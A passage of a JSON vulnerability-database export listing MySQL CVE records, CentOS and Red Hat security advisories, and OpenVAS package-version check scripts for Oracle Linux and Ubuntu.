"cpe:2.3:a:oracle:mysql:5.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.56:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.5.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.82:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.50:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:mysql:mysql:5.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.23:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:31:24", "description": "Multiple stack-based buffer overflows in the CertDecoder::GetName function in src/asn.cpp in TaoCrypt in yaSSL before 1.9.9, as used in mysqld in MySQL 5.0.x before 5.0.90, MySQL 5.1.x before 5.1.43, MySQL 5.5.x through 5.5.0-m2, and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption and daemon crash) by establishing an SSL connection and sending an X.509 client certificate with a crafted name field, as demonstrated by mysql_overflow1.py and the vd_mysql5 module in VulnDisco Pack Professional 8.11. NOTE: this was originally reported for MySQL 5.0.51a.", "edition": 6, "cvss3": {}, "published": "2009-12-30T21:30:00", "title": "CVE-2009-4484", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4484"], "modified": "2020-11-09T20:02:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:4.0", "cpe:/o:canonical:ubuntu_linux:6.06", "cpe:/o:canonical:ubuntu_linux:11.10", "cpe:/a:oracle:mysql:5.0.0", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:8.04", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:canonical:ubuntu_linux:10.10", "cpe:/o:canonical:ubuntu_linux:9.10", "cpe:/o:canonical:ubuntu_linux:10.04", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:9.04"], "id": "CVE-2009-4484", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4484", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:6.06:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:9.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.10:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:9.04:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.0:milestone1:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:11.04:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:8.04:*:*:*:-:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:8.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.0.0:milestone2:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:11.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:-:*:*:*"]}], "centos": [{"lastseen": "2019-12-20T18:26:07", "bulletinFamily": "unix", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2009-4019"], "description": "**CentOS Errata and Security Advisory** CESA-2010:0109\n\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists of\nthe MySQL server daemon (mysqld) and many client programs and libraries.\n\nIt was discovered that the MySQL client ignored certain SSL certificate\nverification errors when connecting to servers. A man-in-the-middle\nattacker could use this flaw to trick MySQL clients into connecting to a\nspoofed MySQL server. (CVE-2009-4028)\n\nNote: This fix may uncover previously hidden SSL configuration issues, such\nas incorrect CA certificates being used by clients or expired server\ncertificates. This update should be carefully tested in deployments where\nSSL connections are used.\n\nA flaw was found in the way MySQL handled SELECT statements with subqueries\nin the WHERE clause, that assigned results to a user variable. A remote,\nauthenticated attacker could use this flaw to crash the MySQL server daemon\n(mysqld). This issue only caused a temporary denial of service, as the\nMySQL daemon was automatically restarted after the crash. (CVE-2009-4019)\n\nWhen the \"datadir\" option was configured with a relative path, MySQL did\nnot properly check paths used as arguments for the DATA DIRECTORY and INDEX\nDIRECTORY directives. An authenticated attacker could use this flaw to\nbypass the restriction preventing the use of subdirectories of the MySQL\ndata directory being used as DATA DIRECTORY and INDEX DIRECTORY paths.\n(CVE-2009-4030)\n\nNote: Due to the security risks and previous security issues related to the\nuse of the DATA DIRECTORY and INDEX DIRECTORY directives, users not\ndepending on this feature should consider disabling it by adding\n\"symbolic-links=0\" to the \"[mysqld]\" section of the \"my.cnf\" configuration\nfile. In this update, an example of such a configuration was added to the\ndefault \"my.cnf\" file.\n\nAll MySQL users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. After installing this\nupdate, the MySQL server daemon (mysqld) will be restarted automatically.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028565.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028566.html\n\n**Affected packages:**\nmysql\nmysql-bench\nmysql-devel\nmysql-server\nmysql-test\n\n**Upstream details at:**\n", "edition": 3, "modified": "2010-03-01T18:43:17", "published": "2010-03-01T18:43:17", "href": "http://lists.centos.org/pipermail/centos-announce/2010-March/028565.html", "id": "CESA-2010:0109", "title": "mysql security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:46:35", "bulletinFamily": "unix", "cvelist": ["CVE-2009-4019", "CVE-2009-4028", "CVE-2009-4030"], "description": "MySQL is a multi-user, multi-threaded SQL database server. It consists of\nthe MySQL server daemon (mysqld) and many client programs and libraries.\n\nIt was discovered that the MySQL client ignored certain SSL certificate\nverification errors when connecting to servers. A man-in-the-middle\nattacker could use this flaw to trick MySQL clients into connecting to a\nspoofed MySQL server. (CVE-2009-4028)\n\nNote: This fix may uncover previously hidden SSL configuration issues, such\nas incorrect CA certificates being used by clients or expired server\ncertificates. This update should be carefully tested in deployments where\nSSL connections are used.\n\nA flaw was found in the way MySQL handled SELECT statements with subqueries\nin the WHERE clause, that assigned results to a user variable. A remote,\nauthenticated attacker could use this flaw to crash the MySQL server daemon\n(mysqld). This issue only caused a temporary denial of service, as the\nMySQL daemon was automatically restarted after the crash. (CVE-2009-4019)\n\nWhen the \"datadir\" option was configured with a relative path, MySQL did\nnot properly check paths used as arguments for the DATA DIRECTORY and INDEX\nDIRECTORY directives. An authenticated attacker could use this flaw to\nbypass the restriction preventing the use of subdirectories of the MySQL\ndata directory being used as DATA DIRECTORY and INDEX DIRECTORY paths.\n(CVE-2009-4030)\n\nNote: Due to the security risks and previous security issues related to the\nuse of the DATA DIRECTORY and INDEX DIRECTORY directives, users not\ndepending on this feature should consider disabling it by adding\n\"symbolic-links=0\" to the \"[mysqld]\" section of the \"my.cnf\" configuration\nfile. In this update, an example of such a configuration was added to the\ndefault \"my.cnf\" file.\n\nAll MySQL users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. After installing this\nupdate, the MySQL server daemon (mysqld) will be restarted automatically.", "modified": "2017-09-08T11:47:46", "published": "2010-02-16T05:00:00", "id": "RHSA-2010:0109", "href": "https://access.redhat.com/errata/RHSA-2010:0109", "type": "redhat", "title": "(RHSA-2010:0109) Moderate: mysql security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:36:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2009-4019"], "description": "Oracle Linux Local Security Checks ELSA-2010-0109", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310122394", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122394", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2010-0109", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-0109.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122394\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:18:10 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-0109\");\n script_tag(name:\"insight\", value:\"ELSA-2010-0109 - mysql security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-0109\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-0109.html\");\n script_cve_id(\"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.77~4.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.77~4.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-devel\", rpm:\"mysql-devel~5.0.77~4.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-server\", rpm:\"mysql-server~5.0.77~4.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-test\", rpm:\"mysql-test~5.0.77~4.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-12-04T11:17:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2446", "CVE-2008-4456", "CVE-2009-4030", "CVE-2008-4098", "CVE-2008-7247", "CVE-2009-4019", "CVE-2009-4484"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-897-1", "modified": "2017-12-01T00:00:00", "published": "2010-02-15T00:00:00", "id": "OPENVAS:840384", "href": "http://plugins.openvas.org/nasl.php?oid=840384", "type": "openvas", "title": "Ubuntu Update for MySQL vulnerabilities USN-897-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_897_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for MySQL vulnerabilities USN-897-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that MySQL could be made to overwrite existing table\n files in the data directory. An authenticated user could use the DATA\n DIRECTORY and INDEX DIRECTORY options to possibly bypass privilege checks.\n This update alters table creation behaviour by disallowing the use of the\n MySQL data directory in DATA DIRECTORY and INDEX DIRECTORY options. This\n issue only affected Ubuntu 8.10. (CVE-2008-4098)\n\n It was discovered that MySQL contained a cross-site scripting vulnerability\n in the command-line client when the --html option is enabled. An attacker\n could place arbitrary web script or html in a database cell, which would\n then get placed in the html document output by the command-line tool. This\n issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 8.10 and 9.04.\n (CVE-2008-4456)\n \n It was discovered that MySQL could be made to overwrite existing table\n files in the data directory. An authenticated user could use symlinks\n combined with the DATA DIRECTORY and INDEX DIRECTORY options to possibly\n bypass privilege checks. This issue only affected Ubuntu 9.10.\n (CVE-2008-7247)\n \n It was discovered that MySQL contained multiple format string flaws when\n logging database creation and deletion. An authenticated user could use\n specially crafted database names to make MySQL crash, causing a denial of\n service. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 8.10 and 9.04.\n (CVE-2009-2446)\n \n It was discovered that MySQL incorrectly handled errors when performing\n certain SELECT statements, and did not preserve correct flags when\n performing statements that use the GeomFromWKB function. An authenticated\n user could exploit this to make MySQL crash, causing a denial of service.\n (CVE-2009-4019)\n \n It was discovered that MySQL incorrectly checked symlinks when using the\n DATA DIRECTORY and INDEX DIRECTORY options. A local user could use symlinks\n to create tables that pointed to tables known to be created at a later\n time, bypassing access restrictions. (CVE-2009-4030)\n \n It was discovered that MySQL contained a buffer overflow when parsing\n ssl certificates. A remote attacker could send crafted requests and cause a\n denial of service or possibly execute arbitrary code. This issue did not\n affect Ubuntu 6.06 LTS and the default compiler options for affected\n releases should reduce the vulnerability to a denial of service. In the\n default installation, attackers would also be isolated by the AppArmor\n MySQL profile. (CVE-2009-4484)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-897-1\";\ntag_affected = \"MySQL vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 8.10 ,\n Ubuntu 9.04 ,\n Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-897-1/\");\n script_id(840384);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-15 16:07:49 +0100 (Mon, 15 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"897-1\");\n script_cve_id(\"CVE-2008-4098\", \"CVE-2008-4456\", \"CVE-2008-7247\", \"CVE-2009-2446\", \"CVE-2009-4019\", \"CVE-2009-4030\", \"CVE-2009-4484\");\n script_name(\"Ubuntu Update for MySQL vulnerabilities USN-897-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15-dev\", ver:\"5.1.30really5.0.75-0ubuntu10.3\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15off\", ver:\"5.1.30really5.0.75-0ubuntu10.3\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.0\", ver:\"5.1.30really5.0.75-0ubuntu10.3\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.0\", ver:\"5.1.30really5.0.75-0ubuntu10.3\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-core-5.0\", ver:\"5.1.30really5.0.75-0ubuntu10.3\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.1.30really5.0.75-0ubuntu10.3\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.1.30really5.0.75-0ubuntu10.3\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.1.30really5.0.75-0ubuntu10.3\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15-dev\", ver:\"5.0.22-0ubuntu6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15off\", ver:\"5.0.22-0ubuntu6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.0\", ver:\"5.0.22-0ubuntu6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.0\", ver:\"5.0.22-0ubuntu6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.0.22-0ubuntu6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.0.22-0ubuntu6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.0.22-0ubuntu6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15-dev\", ver:\"5.0.67-0ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15off\", ver:\"5.0.67-0ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.0\", ver:\"5.0.67-0ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.0\", ver:\"5.0.67-0ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.0.67-0ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.0.67-0ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.0.67-0ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15-dev\", ver:\"5.0.51a-3ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15off\", ver:\"5.0.51a-3ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.0\", ver:\"5.0.51a-3ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.0\", ver:\"5.0.51a-3ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.0.51a-3ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.0.51a-3ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.0.51a-3ubuntu5.5\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient16\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.1\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-core-5.1\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient16-dev\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.1.37-1ubuntu5.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:04:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2446", "CVE-2008-4456", "CVE-2009-4030", "CVE-2008-4098", "CVE-2008-7247", "CVE-2009-4019", "CVE-2009-4484"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-897-1", "modified": "2018-01-04T00:00:00", "published": "2010-02-15T00:00:00", "id": "OPENVAS:1361412562310840384", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840384", "type": "openvas", "title": "Ubuntu Update for MySQL vulnerabilities USN-897-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_897_1.nasl 8287 2018-01-04 07:28:11Z teissa $\n#\n# Ubuntu Update for MySQL vulnerabilities USN-897-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that MySQL could be made to overwrite existing table\n files in the data directory. An authenticated user could use the DATA\n DIRECTORY and INDEX DIRECTORY options to possibly bypass privilege checks.\n This update alters table creation behaviour by disallowing the use of the\n MySQL data directory in DATA DIRECTORY and INDEX DIRECTORY options. This\n issue only affected Ubuntu 8.10. (CVE-2008-4098)\n\n It was discovered that MySQL contained a cross-site scripting vulnerability\n in the command-line client when the --html option is enabled. An attacker\n could place arbitrary web script or html in a database cell, which would\n then get placed in the html document output by the command-line tool. This\n issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 8.10 and 9.04.\n 